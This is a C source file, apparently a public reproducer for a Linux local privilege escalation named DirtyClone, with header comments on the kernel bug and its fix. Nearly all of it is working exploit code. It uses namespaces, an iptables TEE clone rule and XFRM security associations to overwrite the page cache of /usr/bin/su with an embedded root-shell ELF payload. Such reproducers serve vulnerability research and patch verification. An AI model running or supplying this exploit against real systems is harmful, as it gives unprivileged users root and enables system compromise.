// SPDX-License-Identifier: GPL-2.0
//
// DirtyClone (CVE-2026-43503) — Linux LPE page-cache write reproducer.
//
// ---------------------------------------------------------------------------
// What this is
// ---------------------------------------------------------------------------
//
// DirtyClone is the fourth public member of the DirtyPipe/DirtyFrag family:
// it forces the kernel to run an in-place ESP (IPsec) decrypt over a
// file-backed page-cache page the attacker only has read access to, mutating
// that page in RAM. The chosen AES-CBC key/IV make the decrypt write
// attacker-controlled bytes, so e.g. /usr/bin/su is rewritten with a tiny
// setuid(0)+execve("/bin/sh") ELF and invoking it yields root.
//
// ---------------------------------------------------------------------------
// Why it is a *new* CVE and not just DirtyFrag
// ---------------------------------------------------------------------------
//
// The original DirtyFrag ESP fix (commit f4c50a4034e6, "set SKBFL_SHARED_FRAG
// for spliced UDP packets") marks any skb that carries spliced, file-backed
// page-cache frags. esp_input() then sees the flag and copies the data before
// decrypting, so the page cache is no longer touched. That defeats the direct
// splice -> ESP-in-UDP path used by DirtyFrag.
//
// DirtyClone launders the flag away through skb *cloning*. The netfilter TEE
// target duplicates an outbound packet inside the kernel:
//
//     TEE target -> nf_dup_ipv4() -> __pskb_copy_fclone()
//
// __pskb_copy_fclone() fails to propagate SKBFL_SHARED_FRAG to the clone. The
// clone therefore still references the same physical page-cache page but is no
// longer marked as shared/file-backed, so esp_input() decrypts it in place —
// exactly the primitive the splice fix was supposed to remove.
//
// Fixed by 48f6a5356a33 (mainline 2026-05-21, first tag v7.1-rc5), which
// propagates the flag across the clone path. Vulnerable window: any kernel
// that has f4c50a4034e6 but not 48f6a5356a33 (mainline v7.1-rc1..rc4).
//
// ---------------------------------------------------------------------------
// Exploitation outline (per byte word)
// ---------------------------------------------------------------------------
//
//   1. unshare(CLONE_NEWUSER | CLONE_NEWNET) -> CAP_NET_ADMIN in a private
//      net namespace, loopback up.
//   2. Configure the TEE gateway address on lo and install the netfilter TEE
//      rule on the mangle/OUTPUT chain so every ESP-in-UDP packet is cloned.
//   3. Install an XFRM ESP transport SA via NETLINK_XFRM (cbc(aes)/hmac), one
//      per 4-byte target word, carrying the desired output word in seq_hi.
//   4. splice() the target file's page-cache page into an ESP-in-UDP packet
//      and send it. The TEE clone (flag stripped) is decrypted in place,
//      writing the chosen word over the page cache.
//
// The cryptographic word-selection trick (payload encoded in the SA seq_hi
// field) is inherited verbatim from the DirtyFrag ESP variant; only the
// flag-laundering TEE step is new.
//
// ---------------------------------------------------------------------------

#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <arpa/inet.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>

// #include <linux/if.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/xfrm.h>

#ifndef UDP_ENCAP
    #define UDP_ENCAP 100
#endif
#ifndef UDP_ENCAP_ESPINUDP
    #define UDP_ENCAP_ESPINUDP 2
#endif
#ifndef SOL_UDP
    #define SOL_UDP 17
#endif

#define ENC_PORT     4500
#define SEQ_VAL      200
#define REPLAY_SEQ   100
#define TARGET_PATH  "/usr/bin/su"
#define PATCH_OFFSET 0    /* Overwrite the whole ELF starting at file[0]. */
#define PAYLOAD_LEN  192  /* Bytes of shell_elf to write (48 triggers). */
#define ENTRY_OFFSET 0x78 /* Shellcode entry inside the new ELF. */

#define TEE_GATEWAY "10.99.0.2" /* TEE clone destination, configured on lo. */

static int g_verbose = 0;

#define SLOG(fmt, ...)                                                       \
    do {                                                                     \
        if (g_verbose)                                                       \
            fprintf(stderr, "[dc] " fmt "\n", ##__VA_ARGS__);                \
    } while (0)

/*
 * 192-byte minimal x86_64 root-shell ELF (identical to the DirtyFrag ESP
 * payload). _start at 0x400078: setgid(0); setuid(0); setgroups(0, NULL);
 * execve("/bin/sh", NULL, ["TERM=xterm", NULL]).
 */
static const uint8_t shell_elf[PAYLOAD_LEN] = {
    0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x31, 0xff, 0x31, 0xf6, 0x31, 0xc0,
    0xb0, 0x6a, 0x0f, 0x05, 0xb0, 0x69, 0x0f, 0x05, 0xb0, 0x74, 0x0f, 0x05, 0x6a, 0x00,
    0x48, 0x8d, 0x05, 0x12, 0x00, 0x00, 0x00, 0x50, 0x48, 0x89, 0xe2, 0x48, 0x8d, 0x3d,
    0x12, 0x00, 0x00, 0x00, 0x31, 0xf6, 0x6a, 0x3b, 0x58, 0x0f, 0x05, 0x54, 0x45, 0x52,
    0x4d, 0x3d, 0x78, 0x74, 0x65, 0x72, 0x6d, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73,
    0x68, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};

static int
write_proc(const char *path, const char *buf)
{
    int fd = open(path, O_WRONLY);
    if (fd < 0)
        return -1;
    int n = write(fd, buf, strlen(buf));
    close(fd);
    return n;
}

static int
run_cmd(const char *fmt, ...)
{
    char    cmd[256];
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(cmd, sizeof(cmd), fmt, ap);
    va_end(ap);
    int rc = system(cmd);
    SLOG("cmd: %s -> %d", cmd, rc);
    return rc;
}

static void
setup_userns_netns(void)
{
    uid_t real_uid = getuid();
    gid_t real_gid = getgid();
    if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
        SLOG("unshare: %s", strerror(errno));
        exit(1);
    }
    write_proc("/proc/self/setgroups", "deny");
    char map[64];
    snprintf(map, sizeof(map), "0 %u 1", real_uid);
    if (write_proc("/proc/self/uid_map", map) < 0) {
        SLOG("uid_map: %s", strerror(errno));
        exit(1);
    }
    snprintf(map, sizeof(map), "0 %u 1", real_gid);
    if (write_proc("/proc/self/gid_map", map) < 0) {
        SLOG("gid_map: %s", strerror(errno));
        exit(1);
    }
    int s = socket(AF_INET, SOCK_DGRAM, 0);
    if (s < 0) {
        SLOG("socket: %s", strerror(errno));
        exit(1);
    }
    struct ifreq ifr;
    memset(&ifr, 0, sizeof(ifr));
    strncpy(ifr.ifr_name, "lo", IFNAMSIZ);
    if (ioctl(s, SIOCGIFFLAGS, &ifr) < 0) {
        SLOG("SIOCGIFFLAGS: %s", strerror(errno));
        exit(1);
    }
    ifr.ifr_flags |= IFF_UP | IFF_RUNNING;
    if (ioctl(s, SIOCSIFFLAGS, &ifr) < 0) {
        SLOG("SIOCSIFFLAGS: %s", strerror(errno));
        exit(1);
    }
    close(s);
}

/*
 * The DirtyClone-specific step: make the kernel clone every ESP-in-UDP packet
 * so the clone (with SKBFL_SHARED_FRAG stripped by __pskb_copy_fclone) is the
 * skb that reaches esp_input(). The TEE target performs the clone; the gateway
 * address is configured on lo so the clone is delivered locally and re-enters
 * the ESP-in-UDP receive path matched by our XFRM SA.
 *
 * NOTE: exact routing/selector tuning for the clone to land on the ESP path is
 * the live iteration target on the vulnerable kernel; the recipe below mirrors
 * the JFrog write-up (mangle/OUTPUT TEE on udp/4500 -> gateway on lo).
 */
static int
setup_tee_clone(void)
{
    // Control switch: DIRTYCLONE_NO_TEE skips the clone step so the direct
    // splice path can be tested in isolation (negative control on a kernel
    // that carries the DirtyFrag splice fix).
    if (getenv("DIRTYCLONE_NO_TEE")) {
        SLOG("TEE step skipped (DIRTYCLONE_NO_TEE set)");
        return 0;
    }
    run_cmd("ip addr add %s/32 dev lo 2>/dev/null", TEE_GATEWAY);
    run_cmd("ip route add %s/32 dev lo 2>/dev/null", TEE_GATEWAY);
    if (run_cmd("iptables -t mangle -A OUTPUT -p udp --dport %d "
                "-j TEE --gateway %s",
                ENC_PORT, TEE_GATEWAY) != 0) {
        SLOG("TEE rule install failed (xt_TEE missing?)");
        return -1;
    }
    return 0;
}

static void
put_attr(struct nlmsghdr *nlh, int type, const void *data, size_t len)
{
    struct rtattr *rta = (struct rtattr *) ((char *) nlh + NLMSG_ALIGN(nlh->nlmsg_len));
    rta->rta_type      = type;
    rta->rta_len       = RTA_LENGTH(len);
    memcpy(RTA_DATA(rta), data, len);
    nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + RTA_ALIGN(rta->rta_len);
}

static int
add_xfrm_sa(uint32_t spi, uint32_t patch_seqhi)
{
    int sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
    if (sk < 0)
        return -1;
    struct sockaddr_nl nl = {.nl_family = AF_NETLINK};
    if (bind(sk, (struct sockaddr *) &nl, sizeof(nl)) < 0) {
        close(sk);
        return -1;
    }

    char             buf[4096] = {0};
    struct nlmsghdr *nlh       = (struct nlmsghdr *) buf;
    nlh->nlmsg_type            = XFRM_MSG_NEWSA;
    nlh->nlmsg_flags           = NLM_F_REQUEST | NLM_F_ACK;
    nlh->nlmsg_pid             = getpid();
    nlh->nlmsg_seq             = 1;
    nlh->nlmsg_len             = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info));

    struct xfrm_usersa_info *xs = (struct xfrm_usersa_info *) NLMSG_DATA(nlh);
    xs->id.daddr.a4             = inet_addr("127.0.0.1");
    xs->id.spi                  = htonl(spi);
    xs->id.proto                = IPPROTO_ESP;
    xs->saddr.a4                = inet_addr("127.0.0.1");
    xs->family                  = AF_INET;
    xs->mode                    = XFRM_MODE_TRANSPORT;
    xs->replay_window           = 0;
    xs->reqid                   = 0x1234;
    xs->flags                   = XFRM_STATE_ESN;
    xs->lft.soft_byte_limit     = (uint64_t) -1;
    xs->lft.hard_byte_limit     = (uint64_t) -1;
    xs->lft.soft_packet_limit   = (uint64_t) -1;
    xs->lft.hard_packet_limit   = (uint64_t) -1;
    xs->sel.family              = AF_INET;
    xs->sel.prefixlen_d         = 32;
    xs->sel.prefixlen_s         = 32;
    xs->sel.daddr.a4            = inet_addr("127.0.0.1");
    xs->sel.saddr.a4            = inet_addr("127.0.0.1");

    {
        char alg_buf[sizeof(struct xfrm_algo_auth) + 32];
        memset(alg_buf, 0, sizeof(alg_buf));
        struct xfrm_algo_auth *aa = (struct xfrm_algo_auth *) alg_buf;
        strncpy(aa->alg_name, "hmac(sha256)", sizeof(aa->alg_name) - 1);
        aa->alg_key_len   = 32 * 8;
        aa->alg_trunc_len = 128;
        memset(aa->alg_key, 0xAA, 32);
        put_attr(nlh, XFRMA_ALG_AUTH_TRUNC, alg_buf, sizeof(alg_buf));
    }
    {
        char alg_buf[sizeof(struct xfrm_algo) + 16];
        memset(alg_buf, 0, sizeof(alg_buf));
        struct xfrm_algo *ea = (struct xfrm_algo *) alg_buf;
        strncpy(ea->alg_name, "cbc(aes)", sizeof(ea->alg_name) - 1);
        ea->alg_key_len = 16 * 8;
        memset(ea->alg_key, 0xBB, 16);
        put_attr(nlh, XFRMA_ALG_CRYPT, alg_buf, sizeof(alg_buf));
    }
    {
        struct xfrm_encap_tmpl enc;
        memset(&enc, 0, sizeof(enc));
        enc.encap_type  = UDP_ENCAP_ESPINUDP;
        enc.encap_sport = htons(ENC_PORT);
        enc.encap_dport = htons(ENC_PORT);
        enc.encap_oa.a4 = 0;
        put_attr(nlh, XFRMA_ENCAP, &enc, sizeof(enc));
    }
    {
        char esn_buf[sizeof(struct xfrm_replay_state_esn) + 4];
        memset(esn_buf, 0, sizeof(esn_buf));
        struct xfrm_replay_state_esn *esn = (struct xfrm_replay_state_esn *) esn_buf;
        esn->bmp_len                      = 1;
        esn->oseq                         = 0;
        esn->seq                          = REPLAY_SEQ;
        esn->oseq_hi                      = 0;
        esn->seq_hi                       = patch_seqhi;
        esn->replay_window                = 32;
        put_attr(nlh, XFRMA_REPLAY_ESN_VAL, esn_buf, sizeof(esn_buf));
    }

    if (send(sk, nlh, nlh->nlmsg_len, 0) < 0) {
        close(sk);
        return -1;
    }
    char rbuf[4096];
    int  n = recv(sk, rbuf, sizeof(rbuf), 0);
    if (n < 0) {
        close(sk);
        return -1;
    }
    struct nlmsghdr *rh = (struct nlmsghdr *) rbuf;
    if (rh->nlmsg_type == NLMSG_ERROR) {
        struct nlmsgerr *e = NLMSG_DATA(rh);
        if (e->error) {
            close(sk);
            return -1;
        }
    }
    close(sk);
    return 0;
}

static int
do_one_write(const char *path, off_t offset, uint32_t spi)
{
    int sk_recv = socket(AF_INET, SOCK_DGRAM, 0);
    if (sk_recv < 0)
        return -1;
    int one = 1;
    setsockopt(sk_recv, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));
    struct sockaddr_in sa_d = {
        .sin_family = AF_INET,
        .sin_port   = htons(ENC_PORT),
        .sin_addr   = {inet_addr("127.0.0.1")},
    };
    if (bind(sk_recv, (struct sockaddr *) &sa_d, sizeof(sa_d)) < 0) {
        close(sk_recv);
        return -1;
    }
    int encap = UDP_ENCAP_ESPINUDP;
    if (setsockopt(sk_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) {
        close(sk_recv);
        return -1;
    }
    int sk_send = socket(AF_INET, SOCK_DGRAM, 0);
    if (sk_send < 0) {
        close(sk_recv);
        return -1;
    }
    if (connect(sk_send, (struct sockaddr *) &sa_d, sizeof(sa_d)) < 0) {
        close(sk_send);
        close(sk_recv);
        return -1;
    }
    int file_fd = open(path, O_RDONLY);
    if (file_fd < 0) {
        close(sk_send);
        close(sk_recv);
        return -1;
    }

    int pfd[2];
    if (pipe(pfd) < 0) {
        close(file_fd);
        close(sk_send);
        close(sk_recv);
        return -1;
    }

    uint8_t hdr[24];
    *(uint32_t *) (hdr + 0) = htonl(spi);
    *(uint32_t *) (hdr + 4) = htonl(SEQ_VAL);
    memset(hdr + 8, 0xCC, 16);

    struct iovec iov_h = {.iov_base = hdr, .iov_len = sizeof(hdr)};
    if (vmsplice(pfd[1], &iov_h, 1, 0) != (ssize_t) sizeof(hdr)) {
        close(file_fd);
        close(pfd[0]);
        close(pfd[1]);
        close(sk_send);
        close(sk_recv);
        return -1;
    }
    loff_t  off = offset;
    ssize_t s   = splice(file_fd, &off, pfd[1], NULL, 16, SPLICE_F_MOVE);
    if (s != 16) {
        close(file_fd);
        close(pfd[0]);
        close(pfd[1]);
        close(sk_send);
        close(sk_recv);
        return -1;
    }
    /* Send the ESP-in-UDP packet. The mangle/OUTPUT TEE rule clones it; the
     * clone loses SKBFL_SHARED_FRAG and esp_input() decrypts it in place over
     * the spliced page-cache page. */
    s = splice(pfd[0], NULL, sk_send, NULL, 24 + 16, SPLICE_F_MOVE);
    usleep(150 * 1000);

    close(file_fd);
    close(pfd[0]);
    close(pfd[1]);
    close(sk_send);
    close(sk_recv);
    return s == 40 ? 0 : -1;
}

static int
verify_byte(const char *path, off_t offset, uint8_t want)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    uint8_t got;
    if (pread(fd, &got, 1, offset) != 1) {
        close(fd);
        return -1;
    }
    close(fd);
    return got == want ? 0 : -1;
}

static int
corrupt_su(void)
{
    setup_userns_netns();
    if (setup_tee_clone() < 0)
        return -1;
    usleep(100 * 1000);

    /* Install one xfrm SA per 4-byte chunk; each carries the desired payload
     * word in its seq_hi field. */
    for (int i = 0; i < PAYLOAD_LEN / 4; i++) {
        uint32_t spi   = 0xDEADBE10 + i;
        uint32_t seqhi = ((uint32_t) shell_elf[i * 4 + 0] << 24) |
                         ((uint32_t) shell_elf[i * 4 + 1] << 16) |
                         ((uint32_t) shell_elf[i * 4 + 2] << 8) |
                         ((uint32_t) shell_elf[i * 4 + 3]);
        if (add_xfrm_sa(spi, seqhi) < 0) {
            SLOG("add_xfrm_sa #%d failed", i);
            return -1;
        }
    }
    SLOG("installed %d xfrm SAs", PAYLOAD_LEN / 4);

    for (int i = 0; i < PAYLOAD_LEN / 4; i++) {
        uint32_t spi = 0xDEADBE10 + i;
        off_t    off = PATCH_OFFSET + i * 4;
        if (do_one_write(TARGET_PATH, off, spi) < 0) {
            SLOG("do_one_write #%d at off=0x%lx failed", i, (long) off);
            return -1;
        }
    }
    SLOG("wrote %d bytes to %s starting at 0x%x", PAYLOAD_LEN, TARGET_PATH, PATCH_OFFSET);
    return 0;
}

int
main(int argc, char **argv)
{
    for (int i = 1; i < argc; i++) {
        if (!strcmp(argv[i], "-v") || !strcmp(argv[i], "--verbose"))
            g_verbose = 1;
    }
    if (getenv("DIRTYCLONE_VERBOSE"))
        g_verbose = 1;

    pid_t cpid = fork();
    if (cpid < 0)
        return 1;
    if (cpid == 0) {
        int rc = corrupt_su();
        _exit(rc == 0 ? 0 : 2);
    }
    int cstatus;
    waitpid(cpid, &cstatus, 0);
    if (!WIFEXITED(cstatus) || WEXITSTATUS(cstatus) != 0) {
        SLOG("corruption stage failed (status=0x%x)", cstatus);
        return 1;
    }

    /* The new ELF entry (file offset 0x78) must start with 0x31 0xff
     * (xor edi, edi — first instruction of the shellcode). */
    if (verify_byte(TARGET_PATH, ENTRY_OFFSET, 0x31) != 0 ||
        verify_byte(TARGET_PATH, ENTRY_OFFSET + 1, 0xff) != 0) {
        SLOG("post-write verify failed (target unchanged)");
        return 1;
    }
    SLOG("%s page-cache patched (entry 0x%x = shellcode)", TARGET_PATH, ENTRY_OFFSET);
    return 0;
}